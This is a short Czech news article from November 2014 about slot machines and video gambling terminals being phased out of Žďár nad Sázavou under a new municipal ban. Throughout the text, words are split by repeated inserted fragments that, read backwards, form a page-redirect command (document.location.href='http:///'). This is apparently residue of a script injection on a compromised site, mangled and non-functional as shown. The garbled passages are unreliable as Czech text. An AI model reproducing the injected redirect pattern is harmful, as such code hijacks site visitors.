výherní automaty
Rainbow page separator

Výherní zařízení zmizí z města postupně

Sobota, 22. listopadu 2014

Automat

Žďár nad Sázavou / Au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomaty a videoterminály zmizí ze Žďáru nad Sázavou postupně. Ačkoliv omezující vyhláška začala ve městě platit už od začátku října, ještě nějakou dobu potrvá, než bude ukončen provoz veškerých zařízení. Na území Žďáru bylo ke dni zahájení platnosti vyhlášky o zákazu hazardu celkem 24 výherních hracích přístrojů a 207 podobných technických zařízení, které povoluje Ministerstvo financí České republiky.
Provoz au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatů povolených městem bude ukončen nejpozději do 31. prosince [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to roku, rovněž ministerstvo financí zahájilo správní řízení se všemi provozovateli, jimž v minulosti udělilo povolení k provozu zařízení. V těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případech záleží na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom, jak rychle budou ministerstvem vydaná povolení zrušena, přičemž se dá předpokládat, že provozovatelé loterií využijí svého práva na odvolání.